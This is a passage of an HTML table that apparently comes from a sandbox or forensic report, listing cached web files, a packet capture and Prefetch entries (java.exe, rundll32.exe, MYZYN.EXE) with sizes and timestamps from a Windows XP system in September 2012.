<td><span style="color: black; font-size: xx-small;">2KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:30:11 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\ITWY40HX\screenshot[2].jpg</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">37KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:30:59 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\ITWY40HX\searchCA0Y1H1G</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:30:14 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\ITWY40HX\searchCA2KHYDQ</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:30:10 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\ITWY40HX\searchCA6GXH8C</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:30:14 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\ITWY40HX\search[1].htm</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">76KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:30:16 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KMQ52EA9\CAKLU50N.HTM</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:34:00 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KMQ52EA9\dnsd[1].css</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">4KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:29:38 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KMQ52EA9\help_16[1]</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">4KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:31:15 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KMQ52EA9\qsonhs[1].aspx</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:28:38 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KMQ52EA9\redir_not_found[1].htm</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">6KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:29:18 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KMQ52EA9\report[1].htm</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">111KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:30:56 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KMQ52EA9\sCA0R10DS</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">2KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:30:14 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KMQ52EA9\sCA9YH18O</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">2KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:30:14 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KMQ52EA9\sCAVXGZO1</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">2KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:30:09 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KMQ52EA9\searchCA6QGIGC</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:30:12 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KMQ52EA9\searchCA9XHX7I</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:30:10 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KMQ52EA9\searchCAAK6LMZ</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:30:12 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KMQ52EA9\searchCAB0WC2R</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:30:14 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KMQ52EA9\searchCAVTOWF0</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:30:11 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KMQ52EA9\searchCAYG9PUT</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:30:10 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KMQ52EA9\tabswelcome[1]</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">15KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:31:15 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KODEME3N\close_nor[1]</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">3KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:31:15 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KODEME3N\collapse_nor[1]</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">3KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:31:15 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KODEME3N\expand_nor[1]</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">3KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:31:15 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KODEME3N\google_com[1].htm</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">109KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:30:02 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KODEME3N\main[1].htm</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">93KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:33:59 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KODEME3N\NewTabPageScripts[2]</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">4KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:31:15 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KODEME3N\report[2].htm</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">507KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:30:38 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KODEME3N\sCA3FAUVH</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">2KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:30:14 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KODEME3N\sCABOLW00</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">2KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:30:14 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KODEME3N\sCANL4B03</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">2KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:30:12 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KODEME3N\searchCA2HS76W</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:30:10 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KODEME3N\searchCA2PPY3O</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:30:14 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KODEME3N\searchCAGLGZBP</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:30:14 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KODEME3N\s[10]</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">2KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:30:10 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KODEME3N\s[11]</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">2KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:30:11 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KODEME3N\ua[1].png</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:28:42 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\KODEME3N\urlquery_net[1].htm</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">41KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:28:40 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\XRCRG26P\728x90-1[1].gif</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">76KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:29:38 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\XRCRG26P\banner-fade[1].gif</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">2KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:29:38 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\XRCRG26P\domainmap[1].gif</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">34KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:30:30 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\XRCRG26P\home[1].aspx</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">57KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:33:47 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\XRCRG26P\il[1].png</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:28:42 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\XRCRG26P\jp[1].png</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:28:42 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\XRCRG26P\sCA9X3PTW</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">2KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:30:13 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\XRCRG26P\sCAVC54LS</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">2KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:30:14 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\XRCRG26P\screenshot[2].jpg</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">160KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:30:30 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\XRCRG26P\searchCAOZA5VK</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:30:13 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\XRCRG26P\searchCAQVDE8Y</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:30:14 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\XRCRG26P\searchCAUMFERF</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:30:12 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\XRCRG26P\search[10]</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:30:10 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\XRCRG26P\search[11]</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:30:11 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Local Settings\Temporary Internet Files\Content.IE5\XRCRG26P\top[1]</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:31:15 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\My Documents\pcap.pcapng</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1,026KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:32:14 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\WINDOWS\Sun</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\WINDOWS\Sun\Java</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\WINDOWS\Sun\Java\Deployment</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\WINDOWS\Prefetch\DUMPCAP.EXE-241FFA5D.pf</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">37KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:33:30 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\WINDOWS\Prefetch\JAVA.EXE-0C263507.pf</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">71KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:34:01 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\WINDOWS\Prefetch\JAVAWS.EXE-021AC9A9.pf</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">12KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:30:19 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\WINDOWS\Prefetch\JUCHECK.EXE-1B0E4D0A.pf</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">33KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:30:19 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\WINDOWS\Prefetch\MYZYN.EXE-02389B08.pf</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">18KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:31:41 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\WINDOWS\Prefetch\RUNDLL32.EXE-1EDA2CF6.pf</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">22KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:31:47 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
